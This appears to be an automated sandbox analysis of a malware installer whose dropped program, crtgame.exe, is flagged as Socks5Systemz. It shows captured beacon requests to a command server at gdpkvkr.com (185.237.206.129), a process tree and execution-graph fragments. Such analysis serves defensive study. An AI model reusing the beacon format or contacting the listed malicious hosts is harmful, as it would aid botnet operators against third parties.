                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          3192.168.2.449847185.237.206.129805824C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Dec 15, 2024 00:53:49.326066017 CET295OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f528166429e289d5b86953e226c55f676647fc2813369d184da3259568dd906fa19cb HTTP/1.1
                                                                                                          Host: gdpkvkr.com
                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                          Dec 15, 2024 00:53:50.705348015 CET1120INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.20.1
                                                                                                          Date: Sat, 14 Dec 2024 23:53:50 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          X-Powered-By: PHP/7.4.33
                                                                                                          Data Raw: 33 39 30 0d 0a 64 65 32 66 66 65 39 31 32 63 31 61 35 32 35 39 65 62 32 33 36 34 33 64 36 63 30 65 61 38 35 39 33 35 66 65 30 61 34 38 39 65 34 66 30 38 63 35 66 38 61 66 39 31 61 66 65 61 36 38 38 63 33 66 30 66 33 66 31 63 39 36 39 32 30 39 64 30 34 61 35 37 39 64 30 61 64 33 30 33 38 37 31 31 61 38 62 66 66 34 34 66 39 62 34 38 39 36 33 66 30 31 38 64 32 66 38 30 35 39 38 36 39 61 33 61 32 38 36 64 34 33 61 32 32 31 32 62 37 30 63 32 39 35 37 39 32 61 38 65 39 37 64 61 33 37 35 33 34 63 38 36 64 62 30 63 66 38 31 31 63 65 64 39 35 37 62 32 32 37 33 39 30 31 35 36 63 62 35 66 33 66 64 39 35 61 66 65 32 32 38 37 34 37 34 64 61 62 32 64 65 61 61 35 31 31 39 31 35 62 35 64 62 63 62 36 61 62 38 38 65 39 64 36 61 33 34 62 65 31 66 62 62 65 39 32 64 65 32 36 33 39 38 32 31 65 62 63 33 33 65 62 36 66 31 38 61 38 62 38 36 30 61 65 30 34 63 31 62 36 37 38 39 30 31 65 61 65 63 62 39 32 33 38 34 32 39 64 62 39 64 32 33 32 39 64 65 33 38 30 66 65 31 61 66 39 34 31 63 30 35 32 32 36 63 36 32 30 61 66 39 32 32 [TRUNCATED]
                                                                                                          Data Ascii: 390de2ffe912c1a5259eb23643d6c0ea85935fe0a489e4f08c5f8af91afea688c3f0f3f1c969209d04a579d0ad3038711a8bff44f9b48963f018d2f8059869a3a286d43a2212b70c295792a8e97da37534c86db0cf811ced957b227390156cb5f3fd95afe2287474dab2deaa511915b5dbcb6ab88e9d6a34be1fbbe92de2639821ebc33eb6f18a8b860ae04c1b678901eaecb9238429db9d2329de380fe1af941c05226c620af9225c3710c4f4f8ddcf1dbf27278493f3bb766ffb9222d3da3c77c793a1cff9e605e55a34dbea7fbd03f3f181e2a5bdb06d1420d55f60e073e80f1c07c8c83dc89075636c7b0436ff8fb745194e8568518fc09469d27ccf2a22456ec67cf613868a94af4f5d81a2506c3be88ddc9ed4f78de501d870629d7258cc37f135664174a81c2019fce96266489dac33c7101ba2151dcdf294e1b1ab90be7ed675f8043efe90414b7a7f7754a155793506ebcf6a0d9c11ea1760ca034e51f66007845d855c7e01226955272ecc5ca8ce526d1e53f3a17ad6513aa1c1a93e9af12e9dba705d9b98be9b96415f8d7bbde792c2371a97d9e80572d9b4d862e06fe1f69e072144da477d671a19d9996c1d51a78b58b9aac244550fc613cfae58023e0ae9a91677c280
                                                                                                          Dec 15, 2024 00:53:54.089119911 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842925be849e1a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ccd95fbb23 HTTP/1.1
                                                                                                          Host: gdpkvkr.com
                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                          Dec 15, 2024 00:53:54.522368908 CET220INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.20.1
                                                                                                          Date: Sat, 14 Dec 2024 23:53:54 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          X-Powered-By: PHP/7.4.33
                                                                                                          Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: ede2ff49a2e11370


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          4192.168.2.449860185.237.206.129805824C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Dec 15, 2024 00:53:54.756535053 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842925be849e1a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ccd95fbb23 HTTP/1.1
                                                                                                          Host: gdpkvkr.com
                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                          Dec 15, 2024 00:53:56.045377970 CET976INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.20.1
                                                                                                          Date: Sat, 14 Dec 2024 23:53:55 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          X-Powered-By: PHP/7.4.33
                                                                                                          Data Raw: 33 30 30 0d 0a 64 65 32 66 65 38 38 65 32 36 31 64 34 37 34 39 62 39 36 34 37 38 33 39 33 39 36 39 66 38 30 37 33 39 66 63 30 65 35 35 38 32 34 65 30 66 64 62 65 37 61 36 39 31 62 39 61 35 32 62 63 65 36 64 36 31 37 63 35 62 63 66 64 64 35 33 64 63 34 38 35 66 63 62 34 39 38 39 35 61 65 61 34 31 66 36 62 62 66 36 34 34 39 39 35 36 39 37 33 39 30 61 39 32 32 66 38 35 34 37 39 61 39 63 33 66 33 63 36 65 34 36 61 31 33 66 32 34 37 37 63 39 39 32 36 37 32 64 38 38 38 32 64 61 33 36 35 66 34 63 38 65 64 33 30 37 65 37 31 30 63 39 63 37 35 64 62 33 32 66 33 35 31 65 35 34 63 62 35 63 32 61 64 61 35 63 66 38 32 32 38 32 34 61 34 36 62 30 32 63 65 64 62 62 31 62 39 30 35 30 35 32 61 33 62 37 61 33 38 39 66 63 64 36 61 35 35 36 66 65 66 61 62 30 39 61 63 31 32 37 33 39 38 35 30 62 62 63 33 39 65 64 37 62 31 38 61 30 62 39 37 65 61 34 30 32 64 62 62 35 36 36 39 39 31 37 61 64 64 35 39 30 33 39 34 62 38 32 62 39 64 33 32 39 39 36 65 35 38 32 65 30 31 62 66 32 34 66 64 62 34 64 32 64 63 33 33 34 61 66 39 36 32 [TRUNCATED]
                                                                                                          Data Ascii: 300de2fe88e261d4749b96478393969f80739fc0e55824e0fdbe7a691b9a52bce6d617c5bcfdd53dc485fcb49895aea41f6bbf644995697390a922f85479a9c3f3c6e46a13f2477c992672d8882da365f4c8ed307e710c9c75db32f351e54cb5c2ada5cf822824a46b02cedbb1b905052a3b7a389fcd6a556fefab09ac12739850bbc39ed7b18a0b97ea402dbb5669917add590394b82b9d32996e582e01bf24fdb4d2dc334af9620dd7809424792ddf2d9e7777155203eb47df7ba20333ea8c47a67381aea9e635355a74aa9a9fbce3e3914132345da02db540d49f61006208bf4c1628d8cd8840b4830c4a54166f8f8715380ed509b19f30b418325c7f1ba274ee87cd0643e62b348f4f0d91f2d18c1b68cc4c5f55379c45e18990722de298bdd7a1d40600a4b9bc31f9bc393386189dbc03b791fb3284bc6de32470510b708f9ec6b5f8f58eeed0c09b7bef36a4b0b5c945770beffafd7dc1fa47e19a338e61f66037151db56d9e21b248b5073e3d3c997e339d4f93b3511b3641bab181296c70


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          5192.168.2.449866185.237.206.129805824C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Dec 15, 2024 00:53:56.397176027 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842925be849e1a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ccd95fbb23 HTTP/1.1
                                                                                                          Host: gdpkvkr.com
                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                          Dec 15, 2024 00:53:57.696259022 CET220INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.20.1
                                                                                                          Date: Sat, 14 Dec 2024 23:53:57 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          X-Powered-By: PHP/7.4.33
                                                                                                          Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: ede2ff49a2e11370


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          6192.168.2.449872185.237.206.129805824C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Dec 15, 2024 00:53:57.928294897 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842925be849e1a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ccd95fbb23 HTTP/1.1
                                                                                                          Host: gdpkvkr.com
                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                          Dec 15, 2024 00:53:59.329875946 CET220INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.20.1
                                                                                                          Date: Sat, 14 Dec 2024 23:53:59 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          X-Powered-By: PHP/7.4.33
                                                                                                          Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: ede2ff49a2e11370


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          7192.168.2.449875185.237.206.129805824C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Dec 15, 2024 00:53:59.568718910 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842925be849e1a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ccd95fbb23 HTTP/1.1
                                                                                                          Host: gdpkvkr.com
                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                          Dec 15, 2024 00:54:00.858733892 CET220INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.20.1
                                                                                                          Date: Sat, 14 Dec 2024 23:54:00 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          X-Powered-By: PHP/7.4.33
                                                                                                          Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: ede2ff49a2e11370


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          8192.168.2.449880185.237.206.129805824C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Dec 15, 2024 00:54:01.084453106 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842925be849e1a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ccd95fbb23 HTTP/1.1
                                                                                                          Host: gdpkvkr.com
                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                          Dec 15, 2024 00:54:02.418303967 CET220INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.20.1
                                                                                                          Date: Sat, 14 Dec 2024 23:54:02 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          X-Powered-By: PHP/7.4.33
                                                                                                          Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: ede2ff49a2e11370


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          9192.168.2.449885185.237.206.129805824C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Dec 15, 2024 00:54:02.649027109 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842925be849e1a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ccd95fbb23 HTTP/1.1
                                                                                                          Host: gdpkvkr.com
                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                          Dec 15, 2024 00:54:04.014514923 CET1236INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.20.1
                                                                                                          Date: Sat, 14 Dec 2024 23:54:03 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          X-Powered-By: PHP/7.4.33
                                                                                                          Data Raw: 34 65 34 0d 0a 64 65 32 66 65 38 38 65 32 36 31 64 34 37 34 39 62 39 36 34 37 38 33 39 33 39 36 39 66 38 30 37 33 39 66 38 30 61 34 38 39 64 34 66 30 31 63 35 66 62 61 31 38 63 62 64 62 31 32 66 63 38 36 37 36 30 37 37 35 32 63 62 63 38 35 30 64 64 34 39 35 66 63 34 34 36 38 39 35 65 65 64 34 32 65 39 62 32 66 36 34 65 39 33 35 32 39 32 32 37 30 39 39 62 33 30 38 32 35 39 39 65 38 32 33 61 32 61 36 36 34 30 61 32 32 31 32 30 37 39 63 61 39 33 37 39 32 63 38 62 38 39 63 35 33 37 35 61 35 33 39 31 64 61 30 30 66 62 31 62 63 62 64 39 35 63 62 33 32 64 33 36 31 61 34 61 63 39 35 64 32 37 63 35 35 38 66 61 32 32 38 61 34 35 34 64 61 62 32 64 65 61 61 35 31 31 39 35 34 36 35 65 61 33 61 39 61 36 38 31 65 39 64 31 61 36 35 66 65 31 66 62 62 37 39 38 64 34 32 35 33 31 39 63 31 34 62 63 33 31 66 30 37 30 31 38 61 34 61 37 37 63 61 37 30 39 64 65 62 37 37 38 39 38 31 66 61 65 63 32 39 31 32 36 34 61 39 61 61 36 64 32 32 34 38 32 65 33 38 62 65 61 31 61 66 39 34 36 64 65 35 38 32 37 63 30 33 34 61 63 39 31 32 [TRUNCATED]
                                                                                                          Data Ascii: 4e4de2fe88e261d4749b96478393969f80739f80a489d4f01c5fba18cbdb12fc867607752cbc850dd495fc446895eed42e9b2f64e93529227099b3082599e823a2a6640a2212079ca93792c8b89c5375a5391da00fb1bcbd95cb32d361a4ac95d27c558fa228a454dab2deaa51195465ea3a9a681e9d1a65fe1fbb798d425319c14bc31f07018a4a77ca709deb778981faec291264a9aa6d22482e38bea1af946de5827c034ac912cdd7e0c554f91d9f8d8ec7079402033b07df4b02b3334a1d07061321be19f64504aa74ca9aff9d1213e1b1b3c40d908d15c0f57ff1305208bfac4628e89d5900e4b35ceaf476ee6f1735e9bf7548018e90344873bc5f4b62450ed79c5673c61b34bf2f5cd1d2e18dfbb8bc9cceb5179d15819851825d03d8fdf730841651e4b9fc00191c594207a8bd1c1257b1abb3f4bddd5324f1b12b80fe4e872568d5cf0ec0014b7a0f8614e155d915b6fbff8b7dcd71eba7f15bc31e3096d06704fdd5ec6ea12398a5771f6dacb8efc39dae4333114ad6518a0191088f6ad14f6c7a004d9b183efb36515f3dfb2c97d332669b5799f9b482795418c2f10af5a26bf155613f72f967eb5cec2d199b05929f6c89cbb711111a9392ffce19526e0ac9b996e7918aa895df86be2ffd3383c69624c53664263c9775bacd8e64ca3f136715bfdebf9771200011579b8529bc79bf6d872279 [TRUNCATED]
                                                                                                          Dec 15, 2024 00:54:04.014559031 CET224INData Raw: 62 33 34 32 65 65 33 38 30 31 31 32 65 64 65 31 37 36 61 66 35 62 31 31 33 39 33 33 65 62 31 66 34 35 64 39 33 30 39 36 36 38 61 63 36 64 37 36 30 64 61 37 64 62 39 38 66 63 34 31 30 35 61 61 66 64 65 38 37 36 62 37 36 66 31 37 62 65 31 37 30 61
                                                                                                          Data Ascii: b342ee380112ede176af5b113933eb1f45d9309668ac6d760da7db98fc4105aafde876b76f17be170adade9cfed9e18493a3a80794bb9777fa7a57162541283ae0367fb6631ab927bf4b8466f616ffe732565a2c4186940f5c3c099f4fc9109e6773a79d7a150c8b43f29c4d40


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          10192.168.2.449889185.237.206.129805824C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Dec 15, 2024 00:54:04.369048119 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842925be849e1a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ccd95fbb23 HTTP/1.1
                                                                                                          Host: gdpkvkr.com
                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                          Dec 15, 2024 00:54:05.705007076 CET220INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.20.1
                                                                                                          Date: Sat, 14 Dec 2024 23:54:05 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          X-Powered-By: PHP/7.4.33
                                                                                                          Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: ede2ff49a2e11370


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          11192.168.2.449894185.237.206.129805824C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Dec 15, 2024 00:54:05.946388960 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842925be849e1a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ccd95fbb23 HTTP/1.1
                                                                                                          Host: gdpkvkr.com
                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                          Dec 15, 2024 00:54:07.245379925 CET220INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.20.1
                                                                                                          Date: Sat, 14 Dec 2024 23:54:07 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          X-Powered-By: PHP/7.4.33
                                                                                                          Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: ede2ff49a2e11370


                                                                                                          Click to jump to process

                                                                                                          Click to jump to process

                                                                                                          Click to dive into process behavior distribution

                                                                                                          Click to jump to process

                                                                                                          Target ID:0
                                                                                                          Start time:18:52:01
                                                                                                          Start date:14/12/2024
                                                                                                          Path:C:\Users\user\Desktop\Mg5bMQ2lWi.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\Desktop\Mg5bMQ2lWi.exe"
                                                                                                          Imagebase:0x400000
                                                                                                          File size:7'240'000 bytes
                                                                                                          MD5 hash:7700EBA1CEAA134B1DA16D1EDE0E7894
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:low
                                                                                                          Has exited:false

                                                                                                          Target ID:1
                                                                                                          Start time:18:52:01
                                                                                                          Start date:14/12/2024
                                                                                                          Path:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp" /SL5="$1043A,6985375,54272,C:\Users\user\Desktop\Mg5bMQ2lWi.exe"
                                                                                                          Imagebase:0x400000
                                                                                                          File size:704'000 bytes
                                                                                                          MD5 hash:F448D7F4B76E5C9C3A4EAFF16A8B9B73
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:false

                                                                                                          Target ID:2
                                                                                                          Start time:18:52:04
                                                                                                          Start date:14/12/2024
                                                                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Windows\system32\schtasks.exe" /Query
                                                                                                          Imagebase:0x210000
                                                                                                          File size:187'904 bytes
                                                                                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Target ID:3
                                                                                                          Start time:18:52:04
                                                                                                          Start date:14/12/2024
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Target ID:4
                                                                                                          Start time:18:52:04
                                                                                                          Start date:14/12/2024
                                                                                                          Path:C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Program Files (x86)\CRTGame\crtgame.exe" -i
                                                                                                          Imagebase:0x400000
                                                                                                          File size:2'195'454 bytes
                                                                                                          MD5 hash:A158C99AA92F0E29ED84BB25976D4F7A
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:moderate
                                                                                                          Has exited:true

                                                                                                          Target ID:5
                                                                                                          Start time:18:52:04
                                                                                                          Start date:14/12/2024
                                                                                                          Path:C:\Windows\SysWOW64\net.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Windows\system32\net.exe" helpmsg 10
                                                                                                          Imagebase:0x1c0000
                                                                                                          File size:47'104 bytes
                                                                                                          MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Target ID:6
                                                                                                          Start time:18:52:04
                                                                                                          Start date:14/12/2024
                                                                                                          Path:C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Program Files (x86)\CRTGame\crtgame.exe" -s
                                                                                                          Imagebase:0x400000
                                                                                                          File size:2'195'454 bytes
                                                                                                          MD5 hash:A158C99AA92F0E29ED84BB25976D4F7A
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000006.00000002.2944967183.0000000002A31000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:moderate
                                                                                                          Has exited:false

                                                                                                          Target ID:7
                                                                                                          Start time:18:52:04
                                                                                                          Start date:14/12/2024
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Target ID:8
                                                                                                          Start time:18:52:04
                                                                                                          Start date:14/12/2024
                                                                                                          Path:C:\Windows\SysWOW64\net1.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Windows\system32\net1 helpmsg 10
                                                                                                          Imagebase:0x390000
                                                                                                          File size:139'776 bytes
                                                                                                          MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Reset < >

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:21.2%
                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                            Signature Coverage:2.4%
                                                                                                            Total number of Nodes:1499
                                                                                                            Total number of Limit Nodes:22
                                                                                                            execution_graph 4980 409c40 5021 4030dc 4980->5021 4982 409c56 5024 4042e8 4982->5024 4984 409c5b 5027 40457c GetModuleHandleA GetProcAddress 4984->5027 4990 409c6a 5044 4090a4 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 4990->5044 5007 409d43 5106 4074a0 5007->5106 5009 409d05 5009->5007 5139 409aa0 5009->5139 5010 409d84 5110 407a28 5010->5110 5011 409d69 5011->5010 5012 409aa0 4 API calls 5011->5012 5012->5010 5014 409da9 5120 408b08 5014->5120 5018 409def 5019 408b08 21 API calls 5018->5019 5020 409e28 5018->5020 5019->5018 5149 403094 5021->5149 5023 4030e1 GetModuleHandleA GetCommandLineA 5023->4982 5026 404323 5024->5026 5150 403154 5024->5150 5026->4984 5028 404598 5027->5028 5029 40459f GetProcAddress 5027->5029 5028->5029 5030 4045b5 GetProcAddress 5029->5030 5031 4045ae 5029->5031 5032 4045c4 SetProcessDEPPolicy 5030->5032 5033 4045c8 5030->5033 5031->5030 5032->5033 5034 4065b8 5033->5034 5163 405c98 5034->5163 5043 406604 6F551CD0 5043->4990 5045 4090f7 5044->5045 5290 406fa0 SetErrorMode 5045->5290 5050 403198 4 API calls 5051 40913c 5050->5051 5052 409b30 GetSystemInfo VirtualQuery 5051->5052 5053 409be4 5052->5053 5054 409b5a 5052->5054 5058 409768 5053->5058 5054->5053 5055 409bc5 VirtualQuery 5054->5055 5056 409b84 VirtualProtect 5054->5056 5057 409bb3 VirtualProtect 5054->5057 5055->5053 5055->5054 5056->5054 5057->5055 5300 406bd0 GetCommandLineA 5058->5300 5060 409825 5061 4031b8 4 API calls 5060->5061 5063 40983f 5061->5063 5062 406c2c 6 API calls 5064 409785 5062->5064 5066 406c2c 5063->5066 5064->5060 5064->5062 5065 403454 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5064->5065 5065->5064 5067 406c53 GetModuleFileNameA 5066->5067 5068 406c77 GetCommandLineA 5066->5068 5069 403278 4 API calls 5067->5069 5070 406c7c 5068->5070 5071 406c75 5069->5071 5072 406c81 5070->5072 5073 406af0 4 API calls 5070->5073 5076 406c89 5070->5076 5074 406ca4 5071->5074 5075 403198 4 API calls 5072->5075 5073->5070 5077 403198 4 API calls 5074->5077 5075->5076 5078 40322c 4 API calls 5076->5078 5079 406cb9 5077->5079 5078->5074 5080 4031e8 5079->5080 5081 4031ec 5080->5081 5084 4031fc 5080->5084 5083 403254 4 API calls 5081->5083 5081->5084 5082 403228 5086 4074e0 5082->5086 5083->5084 5084->5082 5085 4025ac 4 API calls 5084->5085 5085->5082 5087 4074ea 5086->5087 5321 407576 5087->5321 5324 407578 5087->5324 5088 407516 5089 40752a 5088->5089 5327 40748c GetLastError 5088->5327 5093 409bec FindResourceA 5089->5093 5094 409c01 5093->5094 5095 409c06 SizeofResource 5093->5095 5096 409aa0 4 API calls 5094->5096 5097 409c13 5095->5097 5098 409c18 LoadResource 5095->5098 5096->5095 5099 409aa0 4 API calls 5097->5099 5100 409c26 5098->5100 5101 409c2b LockResource 5098->5101 5099->5098 5102 409aa0 4 API calls 5100->5102 5103 409c37 5101->5103 5104 409c3c 5101->5104 5102->5101 